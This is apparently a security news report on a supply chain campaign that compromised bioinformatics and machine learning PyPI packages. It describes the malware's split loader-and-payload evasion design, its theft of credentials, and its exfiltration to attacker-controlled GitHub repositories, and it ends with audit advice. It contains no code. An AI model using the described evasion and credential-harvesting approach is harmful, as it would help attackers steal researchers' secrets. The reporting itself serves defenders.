A second wave of the Shai-Hulud supply chain campaign struck approximately 29 bioinformatics and machine learning Python packages on PyPI, introducing a new loader-and-payload split evasion architecture and shifting the campaign’s targeting from software developer tooling to scientific research communities. The total package count across the campaign has passed 100, with 471 malicious artifact versions identified.
The June 8 Hades Wave: 29 Bioinformatics and ML PyPI Packages Compromised
The June 8 wave deployed a variant of the campaign’s PyPI-targeting malware designated Hades — distinct from the earlier Miasma variant that attacked npm packages. Where the first campaign waves targeted developer tools including Red Hat npm packages and Azure tooling packages, the Hades wave specifically selected packages used by genomics researchers, computational biologists, and machine learning scientists. The pivot to bioinformatics marks a deliberate expansion of the campaign’s target community rather than a continuation of earlier developer-focused activity.
Security researchers tracking the campaign identified approximately 29 compromised bioinformatics and ML packages in the June 8 wave. The packages would appear in standard PyPI searches and installations alongside legitimate versions, with the malicious content embedded in the package code to execute on import or installation.
Loader-and-Payload Split Architecture: How Hades Evades Detection Differently
Previous waves of the Shai-Hulud campaign bundled the malicious payload within the compromised package itself — a single-artifact approach that static analysis and behavioral scanning tools had begun to detect. The June 8 Hades wave introduced a new architecture: the loader component and the payload are split across separate locations in the filesystem rather than co-located in the package artifact. This separation means that examining the malicious package in isolation reveals only the loader, not the full payload. Detection tools that analyze individual package contents without tracing subsequent filesystem writes or dynamic payload retrieval are less likely to identify the full malicious capability from the initial artifact alone.
The architectural shift demonstrates that the Shai-Hulud campaign operators are actively adapting their evasion approach in response to detection, which is characteristic of a campaign with continued operational goals rather than a one-time opportunistic wave.
From Developer Tooling to Scientific Research: The Shai-Hulud Campaign’s Target Expansion
The first Shai-Hulud waves targeted software developers — a community that regularly installs packages from npm and PyPI, maintains cloud service credentials, and has API keys for development infrastructure. The June 8 pivot to bioinformatics researchers extends this credential theft objective into a different and less security-hardened community.
Bioinformatics and computational biology researchers routinely work with Python packages for genomic data processing, sequence alignment, protein structure analysis, and machine learning pipelines applied to scientific datasets. Their computing environments often include institutional high-performance computing clusters, cloud-based research pipelines funded by pharmaceutical or academic institutions, and access credentials to sequencing data repositories that may hold sensitive clinical or pre-publication research data.
Shai-Hulud Campaign Scope: 100+ Packages and 471 Malicious Artifact Versions
The June 8 wave did not emerge in isolation. The broader Shai-Hulud campaign had already compromised more than 57 npm packages in over 300 malicious versions during the Miasma wave targeting developer tools earlier in June. Combined with the bioinformatics wave, the total campaign footprint has reached more than 100 compromised packages across npm and PyPI, with 471 distinct malicious artifact versions identified. Both the Miasma npm variant and the Hades PyPI variant function as multi-stage droppers that scan the local system and connected cloud services for credentials, API keys, tokens, and secrets.
Credential Theft Targeting Cloud Services, AI Provider Keys, and Research Infrastructure
The malware’s collection behavior targets a broad category of credentials: cloud service access tokens, AI provider API keys, development authentication tokens, and any secrets accessible from the infected environment. For bioinformatics researchers, the relevant credentials extend to institutional computing cluster access, cloud storage buckets containing genomic or clinical data, and potentially API keys for AI or ML infrastructure used in research pipelines.
Upon collecting credentials and secrets from the infected system, both the Miasma and Hades variants self-propagate by publishing the harvested information to attacker-controlled GitHub repositories. This self-propagation mechanism creates a persistent exfiltration channel and means that compromised credentials may have been transmitted before the infection is identified and remediated.
Organizations in scientific research, pharmaceutical development, and academic computing should audit Python and npm package lock files in their environments and review any packages installed in the period corresponding to the campaign’s active waves. Research computing environments that use shared Python environments across multiple users or projects carry elevated risk if any single installation introduced a compromised package to a shared dependency tree.
